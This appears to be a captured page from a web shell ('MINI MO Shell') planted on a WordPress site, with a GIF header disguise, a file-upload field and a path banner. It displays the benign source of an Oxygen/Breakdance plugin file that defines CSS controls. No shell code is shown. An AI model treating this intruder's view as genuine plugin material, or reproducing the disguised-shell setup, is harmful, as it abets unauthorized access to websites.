GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/classes-selectors/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/classes-selectors/controls.php

<?php

namespace Breakdance\ClassesSelectors;

/**
 * @return Control[]
 */
function controls()
{
    return [
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\background"),
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\layout"),
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\size"),
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\typography_with_effects_and_align"),
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\spacing_all", 'Spacing', 'spacing'),
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\borders_without_shadows", "Borders", 'borders'),
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\effects_no_hover"),
        \Breakdance\Elements\PresetSections\getPresetSection("EssentialElements\\custom_css"),
    ];
}

/**
 * @param boolean $withoutCustomCssSupport
 * @return string
 */
function template($withoutCustomCssSupport = false)
{

    $customCssSupport = $withoutCustomCssSupport ? "" : "{{ macros.css(custom_css) }}";

    return '
        %%SELECTOR%% {
            {{ macros.classOrSelectorProperties(background, layout, size, typography, globalSettings, spacing, borders, effects) }}
        }

    ' . $customCssSupport;
}

OHA YOOO - Tarih: 2026-08-04 00:22:06